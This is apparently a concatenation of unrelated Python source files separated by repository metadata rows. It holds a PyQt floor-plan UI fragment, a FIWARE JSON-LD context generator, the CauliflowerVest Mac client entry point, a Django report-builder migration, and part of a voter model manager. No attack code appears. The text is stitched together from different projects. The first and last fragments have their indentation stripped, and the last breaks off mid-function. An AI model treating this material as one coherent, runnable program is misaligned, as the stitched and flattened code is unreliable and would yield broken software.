self.actionGeneriloFile = QtGui.QAction(FloorplanMaker)
self.actionGeneriloFile.setObjectName(_fromUtf8("actionGeneriloFile"))
self.actionAbout = QtGui.QAction(FloorplanMaker)
self.actionAbout.setObjectName(_fromUtf8("actionAbout"))
self.menuPlik.addAction(self.actionNewProject)
self.menuPlik.addAction(self.actionOpenProject)
self.menuPlik.addAction(self.actionSave)
self.menuPlik.addSeparator()
self.menuPlik.addAction(self.actionEnd)
self.menuNarz_dzia.addAction(self.actionGeneriloFile)
self.menuHelp.addAction(self.actionAbout)
self.menubar.addAction(self.menuPlik.menuAction())
self.menubar.addAction(self.menuNarz_dzia.menuAction())
self.menubar.addAction(self.menuHelp.menuAction())
self.retranslateUi(FloorplanMaker)
QtCore.QObject.connect(self.actionEnd, QtCore.SIGNAL(_fromUtf8("triggered()")), FloorplanMaker.close)
QtCore.QMetaObject.connectSlotsByName(FloorplanMaker)
def retranslateUi(self, FloorplanMaker):
FloorplanMaker.setWindowTitle(QtGui.QApplication.translate("FloorplanMaker", "FloorplanMaker", None, QtGui.QApplication.UnicodeUTF8))
self.heaterTabLab.setText(QtGui.QApplication.translate("FloorplanMaker", "Placed heaters:", None, QtGui.QApplication.UnicodeUTF8))
self.btnAddHeater.setText(QtGui.QApplication.translate("FloorplanMaker", "Add", None, QtGui.QApplication.UnicodeUTF8))
self.btnModifyHeater.setText(QtGui.QApplication.translate("FloorplanMaker", "Modify", None, QtGui.QApplication.UnicodeUTF8))
self.btnDeleteHeater.setText(QtGui.QApplication.translate("FloorplanMaker", "Delete", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("FloorplanMaker", "Placed thermometers:", None, QtGui.QApplication.UnicodeUTF8))
self.btnAddTherm.setText(QtGui.QApplication.translate("FloorplanMaker", "Add", None, QtGui.QApplication.UnicodeUTF8))
self.btnModifyTherm.setText(QtGui.QApplication.translate("FloorplanMaker", "Modify", None, QtGui.QApplication.UnicodeUTF8))
self.btnDelete.setText(QtGui.QApplication.translate("FloorplanMaker", "Delete", None, QtGui.QApplication.UnicodeUTF8))
self.floorplanLab.setText(QtGui.QApplication.translate("FloorplanMaker", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Sans\'; font-size:10pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-size:11pt; font-weight:600; font-style:italic;\">Project Floorplan:</span></p></body></html>", None, QtGui.QApplication.UnicodeUTF8))
self.menuPlik.setTitle(QtGui.QApplication.translate("FloorplanMaker", "File", None, QtGui.QApplication.UnicodeUTF8))
self.menuNarz_dzia.setTitle(QtGui.QApplication.translate("FloorplanMaker", "Tools", None, QtGui.QApplication.UnicodeUTF8))
self.menuHelp.setTitle(QtGui.QApplication.translate("FloorplanMaker", "Help", None, QtGui.QApplication.UnicodeUTF8))
        self.actionOpen_project.setText(QtGui.QApplication.translate("FloorplanMaker", "Open project", None, QtGui.QApplication.UnicodeUTF8))
        self.actionSave_project.setText(QtGui.QApplication.translate("FloorplanMaker", "Save project", None, QtGui.QApplication.UnicodeUTF8))
        self.actionClose.setText(QtGui.QApplication.translate("FloorplanMaker", "Close", None, QtGui.QApplication.UnicodeUTF8))
self.actionNewProject.setText(QtGui.QApplication.translate("FloorplanMaker", "New project", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpenProject.setText(QtGui.QApplication.translate("FloorplanMaker", "Open project", None, QtGui.QApplication.UnicodeUTF8))
self.actionSave.setText(QtGui.QApplication.translate("FloorplanMaker", "Save", None, QtGui.QApplication.UnicodeUTF8))
self.actionEnd.setText(QtGui.QApplication.translate("FloorplanMaker", "Close", None, QtGui.QApplication.UnicodeUTF8))
self.actionGeneriloFile.setText(QtGui.QApplication.translate("FloorplanMaker", "Create generilo file", None, QtGui.QApplication.UnicodeUTF8))
self.actionAbout.setText(QtGui.QApplication.translate("FloorplanMaker", "About", None, QtGui.QApplication.UnicodeUTF8))
| mit | 7,286,286,362,284,666,000 | 66.227074 | 275 | 0.725235 | false |
Fiware/dataModels | tools/ldcontext_generator.py | 1 | 9962 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This script produces two files:
- context.jsonld, which is served at https://schema.lab.fiware.org/ld/fiware-data-models-context.jsonld
- mapping_list.yml, which is served at https://uri.fiware.org/ns/data-models
context.jsonld is built by extracting the properties, types and enumerations of each JSON Schema and
converting them into terms of a JSON-LD @context. mapping_list.yml uses the same extraction results
to prepare a list of terms together with their schemas and specifications.
Copyright (c) 2019 FIWARE Foundation e.V.
Authors: José M. Cantera, Dmitrii Demin
"""
import json
import yaml
import os
from datetime import datetime, timezone
from argparse import ArgumentParser
# The aggregated @context will be stored here
aggregated_context = {
}
# The list of mappings (term->schema/specification) will be stored here
terms_list = {
"terms": {}
}
# Schema files for which no associated specification file could be found will be listed here
alert_list = [
]
# Template to prepare a valid URL of a schema for a term mapping
schema_url = 'https://fiware.github.io/data-models/{}'
specification_url = 'https://fiware-datamodels.readthedocs.io/en/latest/{}'
# Agri* schemas stored at another github organization
agri_url = 'https://github.com/GSMADeveloper/NGSI-LD-Entities/blob/master/definitions/{}.md'
# Used to detect attributes which are actually relationships
ENTITY_ID = 'https://fiware.github.io/data-models/common-schema.json#/definitions/EntityIdentifierType'
def read_json(infile):
with open(infile) as data_file:
data = json.loads(data_file.read())
return data
def write_json(data, outfile):
with open(outfile, 'w') as data_file:
data_file.write(json.dumps(data, indent=4, sort_keys=True))
data_file.write("\n")
def write_yaml(data, outfile):
with open(outfile, 'w') as data_file:
data_file.write(yaml.dump(data))
# Finds a node in a JSON Schema
# (previously parsed as a Python dictionary)
def find_node(schema, node_name):
result = None
if isinstance(schema, list):
for instance in schema:
res = find_node(instance, node_name)
if res is not None:
result = res
break
elif isinstance(schema, dict):
for member in schema:
if member == node_name:
result = schema[member]
break
else:
res = find_node(schema[member], node_name)
if res is not None:
result = res
break
return result
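# For example (illustrative): find_node(schema, 'properties') returns the first value found under a
# "properties" key anywhere in the parsed schema, searching both nested dicts and lists, or None if
# no such key exists.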
# extracts the properties dictionary
# A list of dictionaries is returned
def extract_properties(schema):
properties = find_node(schema, 'properties')
out = []
if properties is None:
return out
for p in properties:
if p != "type" and p != "id":
prop = dict()
prop['type'] = 'Property'
prop['name'] = p
ref = find_node(properties[p], '$ref')
if ref is not None and ref == ENTITY_ID:
prop['type'] = 'Relationship'
enum = find_node(properties[p], 'enum')
if enum is not None:
prop['isEnumerated'] = True
pformat = find_node(properties[p], 'format')
if pformat is not None and pformat == 'date-time':
prop['isDate'] = True
out.append(prop)
return out
# extracts the entity type
def extract_entity_type(schema):
out = None
properties = find_node(schema, 'properties')
if properties is not None and 'type' in properties:
type_node = properties['type']
if 'enum' in type_node and len(type_node['enum']) > 0:
out = type_node['enum'][0]
return out
# extracts the enumerations
def extract_enumerations(schema):
out = []
properties = find_node(schema, 'properties')
if properties is None:
return out
for p in properties:
if p != 'type':
prop = properties[p]
enum = find_node(prop, 'enum')
if enum is not None:
if isinstance(enum, list):
for item in enum:
if isinstance(item, str):
out.append(item)
return out
# Generates the LD @context for a list of JSON Schema properties
# (which are attributes) with the URI prefix
def generate_ld_context_attrs(properties, uri_prefix, predefined_mappings):
context = {}
if properties is None:
return context
for p in properties:
p_name = p['name']
if p_name in predefined_mappings:
context[p_name] = predefined_mappings[p_name]
continue
if p['type'] == 'Relationship':
context[p_name] = {
'@type': '@id'
}
elif 'isDate' in p:
context[p_name] = {
'@type': 'https://uri.etsi.org/ngsi-ld/DateTime'
}
elif 'isEnumerated' in p:
context[p_name] = {
'@type': '@vocab'
}
if p_name in context:
context[p_name]['@id'] = uri_prefix + '#' + p_name
else:
context[p_name] = uri_prefix + '#' + p_name
return context
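# For illustration, generate_ld_context_attrs produces entries roughly like the following
# (the property names here are hypothetical):
#   plain attribute "name"        -> "name": "<uri_prefix>#name"
#   relationship attribute "refX" -> "refX": {"@type": "@id", "@id": "<uri_prefix>#refX"}
#   date-time attribute "dateY"   -> "dateY": {"@type": "https://uri.etsi.org/ngsi-ld/DateTime",
#                                              "@id": "<uri_prefix>#dateY"}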
# Generates the LD @context for a list of JSON Schema properties
# (which are enumerated values) with the URI prefix
def generate_ld_context_enums(properties, uri_prefix, predefined_mappings):
context = {}
if properties is None:
return context
for p in properties:
if p in predefined_mappings:
context[p] = predefined_mappings[p]
else:
context[p] = uri_prefix + '#' + p
return context
# Extracts from the schema the relevant JSON-LD @context
def schema_2_ld_context(schema, uri_prefix, predefined_mappings):
properties = extract_properties(schema)
entity_type = extract_entity_type(schema)
enumerations = extract_enumerations(schema)
ld_context = dict()
ld_context['Attribute'] = generate_ld_context_attrs(
properties, uri_prefix, predefined_mappings)
ld_context['Enumeration Value'] = generate_ld_context_enums(
enumerations, uri_prefix, predefined_mappings)
ld_context['Entity Type'] = dict()
if entity_type is not None:
ld_context['Entity Type'][entity_type] = uri_prefix + '#' + entity_type
return ld_context
def process_file(input_file, uri_prefix, predefined_mappings, terms_mappings):
if os.path.isfile(input_file) and input_file.endswith('schema.json'):
print(input_file)
aggregate_ld_context(
input_file,
uri_prefix,
predefined_mappings,
terms_mappings)
elif os.path.isdir(input_file):
for f in (os.listdir(input_file)):
process_file(os.path.join(input_file, f),
uri_prefix, predefined_mappings, terms_mappings)
def aggregate_ld_context(f, uri_prefix, predefined_mappings, terms_mappings):
global aggregated_context
global terms_list
global alert_list
schema = read_json(f)
ld_context = schema_2_ld_context(schema, uri_prefix, predefined_mappings)
for t in ld_context:
for p in ld_context[t]:
aggregated_context[p] = ld_context[t][p]
# adding related specifications and schemas
if p not in terms_list['terms']:
terms_list['terms'][p] = {'specifications': list(),
'schemas': list(),
'type': t}
terms_list['terms'][p]['schemas'].append(
schema_url.format(f.split('../')[1]))
file_to_add = find_file(f, terms_mappings)
if file_to_add:
terms_list['terms'][p]['specifications'].append(file_to_add)
else:
alert_list.append(f)
# Finds the specification file associated with the term
def find_file(f, terms_mappings):
try:
spec1 = os.path.join(f.rsplit('/', 1)[0], 'doc/spec.md')
spec2 = os.path.join(f.rsplit('/', 1)[0], 'doc/introduction.md')
if os.path.isfile(spec1):
path = str(spec1.split('../specs/')
[1]).split('/spec.md')[0] + '/spec/'
return specification_url.format(path)
elif os.path.isfile(spec2):
path = str(spec2.split('../specs/')
[1]).split('/introduction.md')[0] + '/introduction/'
return specification_url.format(path)
elif 'AgriFood' in f:
agri_type = f.split('AgriFood/')[1].split('/schema.json')[0]
if agri_type in terms_mappings:
return agri_url.format(terms_mappings[agri_type])
else:
return None
else:
return None
except UnboundLocalError:
pass
def write_context_file():
print('writing LD @context...' + ' size: ' + str(len(aggregated_context)))
ld_context = {
'@context': aggregated_context,
'generatedAt': datetime.now(timezone.utc).replace(microsecond=0).isoformat()
}
write_json(ld_context, 'context.jsonld')
write_yaml(terms_list, 'terms_list.yml')
def main(args):
uri_prefix = args.u
predefined_mappings = read_json('ldcontext_mappings.json')
terms_mappings = read_json('ldcontext_terms_mappings.json')
process_file(args.f, uri_prefix, predefined_mappings, terms_mappings)
write_context_file()
print("specification file was not found for this files")
print("\n".join(sorted(set(alert_list))))
# Entry point
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('-f', required=True, help='folder')
parser.add_argument('-u', required=True, help='URI prefix')
arguments = parser.parse_args()
main(arguments)
| mit | 1,676,945,092,126,814,700 | 28.383481 | 103 | 0.598434 | false |
google/cauliflowervest | cauliflowervest/client/mac/main.py | 1 | 3039 | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""CauliflowerVest client main entry module."""
import os
import pwd
from absl import app
from absl import flags
from cauliflowervest.client import base_flags
from cauliflowervest.client.mac import commandline
from cauliflowervest.client.mac import glue
from cauliflowervest.client.mac import tkinter
flags.DEFINE_bool('welcome', True, 'Show welcome message.')
flags.DEFINE_string(
'username', None, 'Username to use by default.', short_name='u')
flags.DEFINE_enum(
'action', None, commandline.ALL_ACTIONS.keys(),
'Action to perform (also suppresses GUI)', short_name='a')
flags.DEFINE_string('volume', None, 'UUID of volume')
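# Example command line (a sketch: --server_url and --login_type come from base_flags, and the accepted
# --action values come from commandline.ALL_ACTIONS; neither is defined in this module):
#   python main.py --server_url https://cvest.example.com --login_type oauth2 \
#       --action <action> --volume <volume-uuid> -u someuser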
exit_status = 1
def run_command_line(username, options):
"""Runs CauliflowerVest in command-line mode."""
if options.login_type == 'oauth2':
cmd = commandline.CommandLineOAuth2(options.server_url, username)
else:
    raise NotImplementedError('Unsupported login type: %s' %
                              options.login_type)
return cmd.Execute(options.action, options.volume)
def run_tkinter_gui(username, options):
"""Runs CauliflowerVest with a Tkinter GUI."""
if options.login_type == 'oauth2':
gui = tkinter.GuiOauth(options.server_url, username)
else:
    raise NotImplementedError('Unsupported login type: %s' %
                              options.login_type)
storage = glue.GetStorage()
if not storage:
gui.ShowFatalError('Could not determine File System type')
return 1
_, encrypted_volumes, _ = storage.GetStateAndVolumeIds()
try:
if encrypted_volumes:
gui.EncryptedVolumePrompt(status_callback=status_callback)
else:
gui.PlainVolumePrompt(options.welcome, status_callback=status_callback)
except Exception as e: # pylint: disable=broad-except
gui.ShowFatalError(e)
return 1
finally:
return exit_status # pylint: disable=lost-exception
def status_callback(status):
"""Callback routine to be passed into the gui to set the exit status.
Args:
status: Boolean: success or failure
"""
global exit_status
if status:
exit_status = 0
else:
exit_status = 1
@base_flags.HandleBaseFlags
def main(options):
if options.username:
username = options.username
else:
username = pwd.getpwuid(os.getuid()).pw_name
if options.action:
return run_command_line(username, options)
else:
return run_tkinter_gui(username, options)
if __name__ == '__main__':
app.run(main)
| apache-2.0 | -5,189,660,262,082,169,000 | 28.504854 | 77 | 0.715038 | false |
solvo/derb | report_builder/migrations/0001_initial.py | 1 | 11231 | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-09-12 19:47
from __future__ import unicode_literals
from django.conf import settings
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('async_notifications', '0002_auto_20160515_0018'),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Answer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('annotation', models.TextField(blank=True)),
('text', models.TextField(blank=True)),
('display_text', models.TextField(blank=True)),
],
options={
'verbose_name_plural': 'Answers',
'verbose_name': 'Answer',
},
),
migrations.CreateModel(
name='Observation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
('context', models.TextField()),
('aproved', models.BooleanField(default=False)),
('answer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.Answer')),
],
options={
'verbose_name_plural': 'Observations',
'verbose_name': 'Observation',
},
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.CharField(max_length=500)),
('object_id', models.PositiveIntegerField()),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
],
options={
'verbose_name_plural': 'Projects',
'verbose_name': 'Project',
},
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('class_to_load', models.CharField(max_length=30)),
('text', models.TextField()),
('help', models.TextField(blank=True)),
('answer_options', django.contrib.postgres.fields.jsonb.JSONField()),
('required', models.IntegerField(choices=[(0, 'Optional'), (1, 'Required'), (2, 'Required by hierarchy')], default=0)),
('order', models.CharField(blank=True, max_length=10)),
('auto', models.BooleanField(default=False)),
],
options={
'verbose_name_plural': 'Questions',
'verbose_name': 'Question',
},
),
migrations.CreateModel(
name='Report',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('template', django.contrib.postgres.fields.jsonb.JSONField(default=[{'human_name': 'General information', 'name': 'categ0', 'order': 0, 'subcategories': [{'human_name': 'General information', 'name': 'categ0_categ0', 'order': 0, 'question': [], 'questions': []}], 'subcategories_count': 1}])),
('questions', django.contrib.postgres.fields.jsonb.JSONField(default={})),
('opening_date', models.DateField()),
],
options={
'verbose_name_plural': 'Reports',
'verbose_name': 'Report',
},
),
migrations.CreateModel(
name='ReportByProject',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_date', models.DateField(verbose_name='Opening date')),
('submit_date', models.DateField(verbose_name='Submit date')),
('state', models.SmallIntegerField(choices=[(0, 'Submit pending'), (1, 'Unsubmitted'), (2, 'Aproved'), (3, 'Editing'), (4, 'Canceled'), (5, 'Rejected'), (6, 'In review')], default=0)),
('actions', models.TextField(blank=True, null=True)),
('review_percentage', models.SmallIntegerField(default=0)),
('complete', models.BooleanField(default=False)),
('make_another', models.BooleanField(default=False)),
('created_automatically', models.BooleanField(default=False)),
('creation_date', models.DateField(auto_now=True)),
('additional_info', models.TextField(blank=True, null=True)),
('project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.Project')),
('report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.Report')),
],
options={
'verbose_name_plural': 'Reports by project',
'verbose_name': 'Report by project',
},
),
migrations.CreateModel(
name='ReportType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.TextField()),
('app_name', models.SlugField()),
('name', models.SlugField()),
('action_ok', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='action_ok', to='async_notifications.EmailTemplate')),
('report_end', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='report_end', to='async_notifications.EmailTemplate')),
('report_start', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='report_start', to='async_notifications.EmailTemplate')),
('responsable_change', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='responsable_change', to='async_notifications.EmailTemplate')),
('revision_turn', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='revision_turn', to='async_notifications.EmailTemplate')),
],
options={
'verbose_name_plural': 'Report types',
'verbose_name': 'Report type',
},
),
migrations.CreateModel(
name='Reviewer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.SmallIntegerField(choices=[(1, 'First'), (2, 'Second'), (3, 'Third'), (4, 'Fourth'), (5, 'Fifth'), (6, 'Sixth'), (7, 'Seventh')])),
('state', models.SmallIntegerField(choices=[(0, 'Unsupported'), (1, 'Supported'), (2, 'In review'), (3, 'Supported by the system'), (4, 'Unsupported by the system')], default=0)),
('active', models.BooleanField(default=True)),
('make_observations', models.BooleanField(default=False)),
('can_ask', models.BooleanField(default=False)),
('can_review', models.BooleanField(default=False)),
('assigned_automatically', models.BooleanField(default=False)),
('report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.ReportByProject')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Reviewers',
'verbose_name': 'Reviewer',
},
),
migrations.CreateModel(
name='RevisionTree',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('assignment_criteria', models.CharField(max_length=100)),
('description', models.TextField()),
('report_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.ReportType')),
],
options={
'verbose_name_plural': 'Revision Tree',
'verbose_name': 'Revision Tree',
},
),
migrations.CreateModel(
name='RevisionTreeUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('order', models.SmallIntegerField(choices=[(1, 'First'), (2, 'Second'), (3, 'Third'), (4, 'Fourth'), (5, 'Fifth'), (6, 'Sixth'), (7, 'Seventh')])),
('make_observations', models.BooleanField(default=True)),
('can_ask', models.BooleanField(default=True)),
('can_review', models.BooleanField(default=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Revision Tree Users',
'verbose_name': 'Revision Tree User',
},
),
migrations.AddField(
model_name='revisiontree',
name='revision_tree_user',
field=models.ManyToManyField(to='report_builder.RevisionTreeUser'),
),
migrations.AddField(
model_name='report',
name='type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.ReportType'),
),
migrations.AddField(
model_name='question',
name='report',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.Report'),
),
migrations.AddField(
model_name='observation',
name='reviewer',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.Reviewer'),
),
migrations.AddField(
model_name='answer',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.Question'),
),
migrations.AddField(
model_name='answer',
name='report',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='report_builder.ReportByProject'),
),
migrations.AddField(
model_name='answer',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
] | gpl-3.0 | -3,516,968,302,829,790,000 | 51.24186 | 310 | 0.562639 | false |
wevote/WebAppPublic | voter/models.py | 1 | 55344 | # voter/models.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
from django.db import IntegrityError, models
from django.contrib.auth.models import (BaseUserManager, AbstractBaseUser) # PermissionsMixin
from django.core.validators import RegexValidator
from exception.models import handle_exception, handle_record_found_more_than_one_exception,\
handle_record_not_saved_exception
from validate_email import validate_email
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, generate_voter_device_id, get_voter_device_id, \
get_voter_api_device_id, positive_value_exists
from wevote_settings.models import fetch_next_we_vote_id_last_voter_integer, fetch_site_unique_id_prefix
logger = wevote_functions.admin.get_logger(__name__)
# This way of extending the base user described here:
# https://docs.djangoproject.com/en/1.8/topics/auth/customizing/#a-full-example
# I then altered with this: http://buildthis.com/customizing-djangos-default-user-model/
# class VoterTwitterLink(models.Model):
# voter_id
# twitter_handle
# confirmed_signin_date
# See AUTH_USER_MODEL in config/base.py
class VoterManager(BaseUserManager):
def create_user(self, email=None, username=None, password=None):
"""
Creates and saves a User with the given email and password.
"""
email = self.normalize_email(email)
user = self.model(email=self.normalize_email(email))
# python-social-auth will pass the username and email
if username:
user.fb_username = username
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password):
"""
Creates and saves a superuser with the given email and password.
"""
user = self.create_user(email, password=password)
user.is_admin = True
user.save(using=self._db)
return user
def create_voter(self, email=None, password=None):
email = self.normalize_email(email)
email_not_valid = False
password_not_valid = False
voter = Voter()
voter_id = 0
try:
if validate_email(email):
voter.email = email
else:
email_not_valid = True
if password:
voter.set_password(password)
else:
password_not_valid = True
voter.save()
voter_id = voter.id
        except IntegrityError as e:
handle_record_not_saved_exception(e, logger=logger)
try:
# Trying to save again will increment the 'we_vote_id_last_voter_integer'
# by calling 'fetch_next_we_vote_id_last_voter_integer'
# TODO We could get into a race condition where multiple creates could be failing at once, so we
# should look more closely at this
voter.save()
voter_id = voter.id
            except IntegrityError as e:
handle_record_not_saved_exception(e, logger=logger)
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
results = {
'email_not_valid': email_not_valid,
'password_not_valid': password_not_valid,
'voter_created': True if voter_id > 0 else False,
'voter': voter,
}
return results
def delete_voter(self, email):
email = self.normalize_email(email)
voter_id = 0
voter_we_vote_id = ''
voter_deleted = False
if positive_value_exists(email) and validate_email(email):
email_valid = True
else:
email_valid = False
try:
if email_valid:
results = self.retrieve_voter(voter_id, email, voter_we_vote_id)
if results['voter_found']:
voter = results['voter']
voter_id = voter.id
voter.delete()
voter_deleted = True
except Exception as e:
handle_exception(e, logger=logger)
results = {
'email_not_valid': True if not email_valid else False,
'voter_deleted': voter_deleted,
'voter_id': voter_id,
}
return results
def retrieve_voter_from_voter_device_id(self, voter_device_id):
voter_id = fetch_voter_id_from_voter_device_link(voter_device_id)
if not voter_id:
results = {
'voter_found': False,
'voter_id': 0,
'voter': Voter(),
}
return results
voter_manager = VoterManager()
results = voter_manager.retrieve_voter_by_id(voter_id)
if results['voter_found']:
voter_on_stage = results['voter']
voter_on_stage_found = True
voter_id = results['voter_id']
else:
voter_on_stage = Voter()
voter_on_stage_found = False
voter_id = 0
results = {
'voter_found': voter_on_stage_found,
'voter_id': voter_id,
'voter': voter_on_stage,
}
return results
def fetch_we_vote_id_from_local_id(self, voter_id):
results = self.retrieve_voter_by_id(voter_id)
if results['voter_found']:
voter = results['voter']
return voter.we_vote_id
else:
return None
def fetch_local_id_from_we_vote_id(self, voter_we_vote_id):
results = self.retrieve_voter_by_we_vote_id(voter_we_vote_id)
if results['voter_found']:
voter = results['voter']
return voter.id
else:
return 0
def retrieve_voter_by_id(self, voter_id):
email = ''
voter_we_vote_id = ''
voter_manager = VoterManager()
return voter_manager.retrieve_voter(voter_id, email, voter_we_vote_id)
def retrieve_voter_by_we_vote_id(self, voter_we_vote_id):
voter_id = ''
email = ''
voter_manager = VoterManager()
return voter_manager.retrieve_voter(voter_id, email, voter_we_vote_id)
def retrieve_voter_by_twitter_request_token(self, twitter_request_token):
voter_id = ''
email = ''
voter_we_vote_id = ''
voter_manager = VoterManager()
return voter_manager.retrieve_voter(voter_id, email, voter_we_vote_id, twitter_request_token)
def retrieve_voter_by_facebook_id(self, facebook_id):
voter_id = ''
email = ''
voter_we_vote_id = ''
twitter_request_token = ''
voter_manager = VoterManager()
return voter_manager.retrieve_voter(voter_id, email, voter_we_vote_id, twitter_request_token, facebook_id)
def retrieve_voter_by_twitter_id(self, twitter_id):
voter_id = ''
email = ''
voter_we_vote_id = ''
twitter_request_token = ''
facebook_id = 0
voter_manager = VoterManager()
return voter_manager.retrieve_voter(voter_id, email, voter_we_vote_id, twitter_request_token, facebook_id,
twitter_id)
def retrieve_voter_from_organization_we_vote_id(self, organization_we_vote_id):
voter_id = ''
email = ''
voter_we_vote_id = ''
twitter_request_token = ''
facebook_id = 0
twitter_id = 0
voter_manager = VoterManager()
return voter_manager.retrieve_voter(voter_id, email, voter_we_vote_id, twitter_request_token, facebook_id,
twitter_id, organization_we_vote_id)
def retrieve_voter(self, voter_id, email='', voter_we_vote_id='', twitter_request_token='', facebook_id=0,
twitter_id=0, organization_we_vote_id=''):
voter_id = convert_to_int(voter_id)
if not validate_email(email):
# We do not want to search for an invalid email
email = None
if positive_value_exists(voter_we_vote_id):
voter_we_vote_id = voter_we_vote_id.strip().lower()
if positive_value_exists(organization_we_vote_id):
organization_we_vote_id = organization_we_vote_id.strip().lower()
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
voter_on_stage = Voter()
try:
if positive_value_exists(voter_id):
voter_on_stage = Voter.objects.get(id=voter_id)
# If still here, we found an existing voter
voter_id = voter_on_stage.id
            elif email != '' and email is not None:
voter_on_stage = Voter.objects.get(
email=email)
# If still here, we found an existing voter
voter_id = voter_on_stage.id
elif positive_value_exists(voter_we_vote_id):
voter_on_stage = Voter.objects.get(
we_vote_id=voter_we_vote_id)
# If still here, we found an existing voter
voter_id = voter_on_stage.id
elif positive_value_exists(twitter_request_token):
voter_on_stage = Voter.objects.get(
twitter_request_token=twitter_request_token)
# If still here, we found an existing voter
voter_id = voter_on_stage.id
elif positive_value_exists(facebook_id):
voter_on_stage = Voter.objects.get(
facebook_id=facebook_id)
# If still here, we found an existing voter
voter_id = voter_on_stage.id
elif positive_value_exists(twitter_id):
voter_on_stage = Voter.objects.get(
twitter_id=twitter_id)
# If still here, we found an existing voter
voter_id = voter_on_stage.id
elif positive_value_exists(organization_we_vote_id):
voter_on_stage = Voter.objects.get(
linked_organization_we_vote_id=organization_we_vote_id)
# If still here, we found an existing voter
voter_id = voter_on_stage.id
else:
voter_id = 0
error_result = True
except Voter.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
error_result = True
exception_multiple_object_returned = True
except Voter.DoesNotExist as e:
error_result = True
exception_does_not_exist = True
results = {
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'voter_found': True if voter_id > 0 else False,
'voter_id': voter_id,
'voter': voter_on_stage,
}
return results
def create_voter_with_voter_device_id(self, voter_device_id):
logger.info("create_voter_with_voter_device_id(voter_device_id)")
def clear_out_abandoned_voter_records(self):
# We will need a method that identifies and deletes abandoned voter records that don't have enough information
# to ever be used
logger.info("clear_out_abandoned_voter_records")
def save_facebook_user_values(self, voter, facebook_id, facebook_email=''):
try:
if facebook_id == 0:
voter.facebook_id = 0
elif positive_value_exists(facebook_id):
voter.facebook_id = facebook_id
if facebook_email == '' or facebook_email is False:
voter.facebook_email = ''
elif positive_value_exists(facebook_email):
voter.facebook_email = facebook_email
voter.save()
success = True
